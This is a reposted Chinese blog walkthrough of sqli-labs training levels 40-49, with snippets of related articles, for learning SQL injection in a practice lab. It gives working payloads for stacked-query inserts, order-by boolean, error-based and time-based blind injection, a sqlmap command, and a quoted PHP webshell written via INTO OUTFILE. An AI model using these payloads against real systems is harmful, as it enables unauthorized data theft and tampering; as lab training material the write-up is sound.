【20171103中】sqli-libs Less 40-49

最新推荐文章于 2024-03-03 12:54:23 发布
转载 最新推荐文章于 2024-03-03 12:54:23 发布 · 65 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/heijuelou/p/7779830.html
文章标签:

#数据库

 

  Less 40:

  题目:

  分析:此题可以实现sql的叠加,即注入的时候可以构成sql1;sql2...执行。

  payload: http://192.168.162.135/sqli-libs/Less-40/?id=1');insert into users(id,username,password) value('100','hello','world')--+

  效果:

  Less 41:

  分析:和Less40类似,payload: http://192.168.162.135/sqli-libs/Less-41/?id=1;insert into users(id,username,password) value('41','hello41','world41')--+

  Less 42:

  题目:

  分析:这题同样是可以叠加注入

  payload: login_user=admin&login_password=1";insert into users(id,username,password) value('42','h42','w42')#&mysubmit=Login

  Less 43 - 45:和Less42类似

  login_user=a&login_password=b');create table less43 like users#&mysubmit=Login

  login_user=a&login_password=b';create table less44 like users#&mysubmit=Login

  login_user=a&login_password=b');create table less45 like users#&mysubmit=Login

  Less 46:

  题目:

  分析:此处是输入sort参数,sql中有效部分是order by XXX,XXX一般构成 表中的列序号 + 升降序,例如:select * from users order by 1 desc;将users表按照第一列降序排序。

    所以这里可以在XXX处注入。用到的是rand()函数,rand()返回0~1的随机数,但是传入整数时,会一直返回一个浮点数,固定不变。所以我们构造rand(ascii(left(database(),1))=115)进行判断数据库名称的第一个字符是不是115,rand参数为一个表达 式,为真,则会是rand(1),否则rand(0),通过页面显示可以看出自己的判断是否正确。

  payload: http://192.168.162.135/sqli-libs/Less-46/?sort=rand(ascii(left(database(),1))=115)

  效果:

  

  Less 47:

  题目:类似Less 46,但是无回现,可通过错误日志显示,因此 payload: http://192.168.162.135/sqli-libs/Less-47/?sort=1' and extractvalue(1, concat(0x7e, database()))--+

  Less 48: 

  题目:类似Less 46,payload: http://192.168.162.135/sqli-libs/Less-48/?sort=rand(ascii(left(database(),1))=115)

  Less 49:

  题目:类似Less 46,无回现,无错误日志,通过时间注入法,payload: http://192.168.162.135/sqli-libs/Less-49/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+

转载于:https://www.cnblogs.com/heijuelou/p/7779830.html

靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
weixin_54626591的博客
12-05 3787
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2346
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-libs闯关记录
weixin_45937436的博客
05-07 653
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 方法一:手工UNION联合查询注入 输入单引号,页面错误,如下: 根据报错信息,可以确定输入参数的内容被存放到一对单引号中间, 猜想:咱们输入的1在数据库中出现的位置为:select … from … where id=’1’ …, 也可以查看sqli-lab中...
sqli-labs通关笔记
m0_55563900的博客
04-04 4653
32关 宽字节注入 正常思路 输入’ " 等等一些特殊符号 输入单引号之后出现了转义,把单引号转义成’,所以要用GBK编码 %df+’ 字段数为3列,然后使用联合查询就可以了
sqli-libs
wl7979的博客
12-21 372
第五关 双查询注入 什么是双查询注入?简单来说其实就是一个查询语句包含一个查询语句,实际上是报错注入的一种! 这关通关的原理就在于:双注入查询需要联合和MYSQL的BUG来进行报错注入 在此之前,我们先掌握些必要的MYSQL函数: Rand() #产生0到1之间的随机小数的函数 Floor() #取整数函数 Count() #汇总函数 Group by #分组语句 Substr() #用于字符串加减 Ord() #将ascii码值转为字符 Mid() #字符串截取 Ifnull(exp1,exp2) #如
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1020
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
SQLI-LIBS靶场五-报错注入
qq_66291050的博客
05-18 303
less-5没有显存位了,不能使用联合查询,也就是说明UNION SELECT 1,2,3其中的1,2,3是不会被显示在网页返回的文字中。从靶场二跳到靶场五是因为其中真的没什么好讲的,把源码拿出来搞一个ECHO $sql 就可以在注入的时候看到执行语句的过程。这样写就差不多,当然了,细心的就会发现为什么是双引号闭合?首先,我们要了解一个MYSQL里面的UPDATEXML函数。发现是单引号,那么我们就用单引号闭合这个语句。这样写的,但是我发现,我这里是根本行不通的。剩下的我也懒得说,就这样。
SQLi-LABS Less-6
m0_64898960的博客
04-13 453
SQLi-LABS Less-6
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1106
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-libs(Less5~Less7)
henghengzhao_的博客
10-16 814
去做了几道ctf题,发现自己还是太菜了,于是还是回来老老实实先把最基本的靶场打完吧接下来就不写的那么详细了,贴图不会那么多了,只记录关键的代码,以及相关的知识点。
sqli-libs(7)
weixin_30566149的博客
05-22 323
导出文件GET字符型注入 0x01介绍 导出到文件就是可以将查询结果导出到一个文件中,如常见的将一句话木马导出到一个php文件中,sqlmap中也有导出一句话和一个文件上传的页面 常用的语句是: select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php" ,当这里要获取到网站的在系统中的具...
sqli-libs(3)
weixin_30438813的博客
05-18 172
今天我们来讲解 sqli-libs(3) 有括号的单引号报错 首先我们来查看加入'看报错了 在加‘’ 没报错 证明 存在注入 然后我们看加入’的报错回显的是什么 和我们的sqli-libs(1)的报错对比一下 发现多了一个)证明他的语句变成了 id=那我们可以根据此特性构造闭合语句 我们查看源代码 发现确实是多了 括号的 我们此时在构造id=1')闭合前面的括号和引号 而后面的...
sqli-libs系列
qq_43511094的博客
12-31 2150
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
sqli-libs 1-5
鲨鱼辣椒的博客
05-19 742
目录 sqlmap 判断是否有注入点 获取数据库名 获取数据库中的表名 获取表中的列名 获取列中的字段 sqlmap 判断是否有注入点 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1 看报错可知,首先是GET请求,然后有四种注入类型依次分别是布尔型盲注、报错注入、时间型盲注、和联合注入 获取数据库sqlmap.py -u http://127.0.0.1/sqli/sqli-labs.
SQLI-libs 1-8
qq_43871200的博客
03-20 368
前几天看到同学在群里发的sqli-libs教程,想着在家闲着也是无聊,不如搞点事情,于是按照教程下载了phpstudy和sqli-libs,学习一波 第一二三关没什么好说的,总结 查库名:select schema_name from information_schema.schemata 查表名:select table_name from information_schema.tables ...
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 4155
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
sqli-libs(1-6)闯关笔记(纯手注)
qq_40671478的博客
08-12 997
SQL/Less-1 单引号字符串型回显注入 1.判断闭合字符 http://182.92.220.201/Less-1/?id=1' #报错信息use near ''1'' LIMIT 0,1' at line 1 http://182.92.220.201/Less-1/?id=1' and 1=1 -- = #正常 #注意:注释符--后面要有空格 http://182.92.220.201/Less-1/?id=1' and 1=2 -- = #异常 http://182.92.220.201/L
sqli-labs less8
最新发布
08-19
sqli-labs 平台的 Less-8 关卡是一个典型的布尔盲注(Boolean-based Blind SQL Injection)场景。该关卡没有明确的回显信息,攻击者需要通过页面返回的布尔状态(正常或异常)来判断注入语句是否执行成功,从而逐步推断数据库信息。 ### 解题思路 在 Less-8 中,注入点位于 `id` 参数,使用单引号 `'` 作为闭合方式。注入点的基本形式为: ```http http://localhost/sqli-labs/Less-8/?id=1' ``` #### 1. 判断注入点是否存在 尝试构造布尔表达式来验证注入点是否有效。例如: ```http http://localhost/sqli-labs/Less-8/?id=1' AND 1=1 --+ ``` 如果页面正常显示内容,则说明布尔表达式为真时页面正常;再尝试: ```http http://localhost/sqli-labs/Less-8/?id=1' AND 1=2 --+ ``` 如果页面无内容或出现错误,则确认存在布尔盲注漏洞。 #### 2. 猜解数据库名称长度 通过 `LENGTH(database())` 函数判断当前数据库名称的长度: ```http http://localhost/sqli-labs/Less-8/?id=1' AND LENGTH(database()) > 5 --+ ``` 逐步调整数值,确定数据库名称的具体长度。 #### 3. 猜解数据库名称 使用 `SUBSTR()` 和 `ASCII()` 函数逐字符判断数据库名称: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR(database(),1,1)) > 97 --+ ``` 通过二分法逐步缩小字符范围,最终确定数据库名称。 #### 4. 猜解表名 假设已知数据库名为 `security`,可以使用以下语句获取表名: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1),1,1)) > 97 --+ ``` 逐字符获取表名,直到完整识别出目标表(如 `users`)。 #### 5. 猜解列名 获取 `users` 表的列名: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='security' LIMIT 0,1),1,1)) > 97 --+ ``` 逐字符获取列名,如 `username`、`password` 等。 #### 6. 获取数据 最后,获取具体字段的数据,例如用户名和密码: ```http http://localhost/sqli-labs/Less-8/?id=1' AND ASCII(SUBSTR((SELECT username FROM users LIMIT 0,1),1,1)) > 64 --+ ``` 重复上述步骤,逐字符提取敏感信息。 ### 自动化工具辅助 在实际渗透测试中,可以使用如 **sqlmap** 等工具自动完成上述过程。例如: ```bash sqlmap -u "http://localhost/sqli-labs/Less-8/?id=1" --batch --risk=3 --level=5 --dbs ``` 该命令可自动探测数据库信息,并提取表名和字段内容。 ### 注意事项 - 所有操作应在合法授权范围内进行,避免非法入侵。 - 布尔盲注效率较低,建议结合延时注入(Time-based Blind SQL Injection)提升速度。 - 部分 WAF(Web Application Firewall)可能拦截敏感关键字,需对注入语句进行编码或绕过处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值